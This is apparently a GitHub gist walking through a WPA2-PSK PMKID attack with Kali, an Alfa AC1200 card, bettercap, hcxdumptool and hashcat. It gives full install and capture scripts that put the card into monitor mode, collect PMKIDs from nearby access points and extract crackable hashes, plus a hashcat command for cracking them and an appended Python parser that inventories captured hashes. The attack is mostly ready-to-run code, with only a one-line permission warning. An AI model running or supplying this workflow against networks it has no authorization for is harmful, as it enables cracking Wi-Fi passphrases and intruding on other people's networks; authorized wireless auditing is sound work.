@jthuraisamy
Last active January 18, 2022 23:58
WPA2-PSK PMKID Attack with Kali Live + Alfa AC1200

About

This short post goes over the workflow I use for the PMKID attack using an Alfa AC1200 (AWUS036ACH) card with a bootable Kali USB and bettercap + hcxdumptool. I have noticed more results using hcxdumptool compared to wifi.assoc all in bettercap, but I still prefer to view and log the output in bettercap, so this workflow helps make the most of both tools.

There's plenty out there about this attack (see resources at bottom), so nothing particularly novel here. As always, you must only execute this workflow on networks where you have permission.

Setup

  1. Laptop
  2. Kali Live USB
  3. Alfa AC1200 (AWUS036ACH)

Installation

  1. Boot into Kali.
  2. Connect to a network with Internet access to download packages.
  3. Execute install.sh script.
  4. Ensure that the card is connected when prompted.
  5. Confirm that the card is running in monitor mode with iwconfig.

Capturing Hashes

  1. Execute capture.sh script.
  2. When you are done capturing, enter wifi.show; wifi.recon off; q at the bettercap prompt.
  3. When the script finishes, it lists all APs for which PMKIDs were captured.
  4. Hashes will be found in the *.pmkid.txt files.
  5. Session logs will be found in the *-session_{TOOL}.log files.

Cracking Hashes

  1. Use hashcat with mode 16800, e.g. hashcat -m16800 hashes.txt wordlist.txt --show --force.

Resources

install.sh

#!/bin/bash
# Install AWUS036ACH drivers.
apt update
apt --yes install realtek-rtl88xxau-dkms
# Install Bettercap.
apt --yes install build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
mkdir -p /opt/bettercap
cd /opt/bettercap
wget https://github.com/bettercap/bettercap/releases/download/v2.28/bettercap_linux_amd64_v2.28.zip
unzip bettercap_linux_amd64_v2.28.zip
# Install hcxtools.
apt update
kill `lsof /var/lib/dpkg/lock-frontend | tail -1 | awk '{print $2}'`
apt --yes install git libcurl4-openssl-dev libssl-dev zlib1g-dev
cd /opt
git clone https://github.com/ZerBea/hcxdumptool.git
git clone https://github.com/ZerBea/hcxtools.git
cd /opt/hcxdumptool
make
make install
cd /opt/hcxtools
make
make install
# Plugin AWUS036ACH.
read -p "Connect the AWUS036ACH, then press [ENTER]..."
service network-manager stop
killall wpa_supplicant
sleep 2
ip link set wlan1 down
sleep 2
iwconfig wlan1 mode monitor
sleep 2
ip link set wlan1 up
capture.sh

#!/bin/bash
# Run hcxdumptool in the background while bettercap displays and logs the session.
mkdir -p ~/captures/
cd ~/captures/ || exit 1
# One timestamp for the whole run, so the capture and log files share a prefix.
ts="$(date +%Y%m%d_%H%M%S)"
hcxdumptool -i wlan1 -o "${ts}-handshakes_hcxdumptool.pcapng" --enable_status=1 | tee "${ts}-session_hcxdumptool.log" &
sleep 1
/opt/bettercap/bettercap -iface wlan1 -eval "events.ignore wifi.ap.lost; events.ignore wifi.client.probe; events.ignore wifi.client.new; set wifi.handshakes.file ${ts}-handshakes_bettercap.pcap; set wifi.deauth.open false; wifi.recon on" | tee "${ts}-session_bettercap.log"
sleep 1
killall hcxdumptool
sleep 2
echo "Extracting PMKID hashes from PCAP files..."
# Glob the capture files directly instead of parsing ls output; skip a pattern that matched nothing.
for pcap_file in *.pcap *.pcapng; do
    [ -e "$pcap_file" ] || continue
    hcxpcapngtool -o "$pcap_file.pmkid.txt" "$pcap_file"
done
echo "PMKIDs captured for the following APs:"
# Field -4 of each hash line is the hex-encoded ESSID; blank lines are skipped.
python3 -c "import glob, binascii, pprint; pprint.pprint(set(binascii.unhexlify(line.split('*')[-4]).decode('utf-8', 'replace') for hcf in glob.glob('*.pmkid.txt') for line in open(hcf).read().splitlines() if line))"
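The one-liner at the end of capture.sh only extracts the ESSID field. The following is an added example, not part of the gist, that parses the *.pmkid.txt lines properly, accepting both the 4-field hashcat 16800 style and the 9-field 22000 style that hcxpcapngtool writes, skipping 22000 type 02 entries (EAPOL MICs, which carry no PMKID), and producing an ESSID-to-AP inventory so an administrator can see which of their own access points hand out PMKIDs. The sample lines are constructed with placeholder hex values.

```python
import binascii
from collections import defaultdict


def parse_hash_line(line):
    """Return (essid, mac_ap, mac_sta, pmkid) for one hash line, or None.

    Accepts the 4-field 16800 style (PMKID*MAC_AP*MAC_STA*ESSID) and the
    9-field 22000 style (WPA*TYPE*PMKID/MIC*MAC_AP*MAC_STA*ESSID*ANONCE*EAPOL*MP).
    22000 type 02 entries are EAPOL MICs, not PMKIDs, and are skipped.
    """
    fields = line.strip().split('*')
    if len(fields) == 4:
        pmkid, mac_ap, mac_sta, essid_hex = fields
    elif len(fields) == 9 and fields[0] == 'WPA':
        if fields[1] != '01':
            return None
        pmkid, mac_ap, mac_sta, essid_hex = fields[2:6]
    else:
        return None
    if len(pmkid) != 32 or len(mac_ap) != 12 or len(mac_sta) != 12:
        return None
    try:
        essid = binascii.unhexlify(essid_hex).decode('utf-8', 'replace')
    except (binascii.Error, ValueError):
        return None
    return essid, mac_ap.lower(), mac_sta.lower(), pmkid.lower()


def pmkid_inventory(lines):
    """Map each ESSID to the set of AP MACs that handed out a PMKID."""
    inventory = defaultdict(set)
    for line in lines:
        parsed = parse_hash_line(line)
        if parsed is not None:
            essid, mac_ap, _sta, _pmkid = parsed
            inventory[essid].add(mac_ap)
    return dict(inventory)


# Constructed sample lines with placeholder hex values (not real captures).
OFFICE = binascii.hexlify(b'Office').decode()
GUEST = binascii.hexlify(b'Guest').decode()
SAMPLE_LINES = [
    'WPA*01*' + 'ab' * 16 + '*020000000001*020000000002*' + OFFICE + '***',
    'WPA*02*' + 'cd' * 16 + '*020000000001*020000000003*' + OFFICE
    + '*' + '00' * 32 + '*' + '11' * 20 + '*00',
    'ef' * 16 + '*020000000009*020000000004*' + GUEST,
    'not a hash line',
]

if __name__ == '__main__':
    for essid, aps in sorted(pmkid_inventory(SAMPLE_LINES).items()):
        print(f'{essid}: {", ".join(sorted(aps))}')
```

To run it on real output, replace SAMPLE_LINES with the lines read from the *.pmkid.txt files in ~/captures.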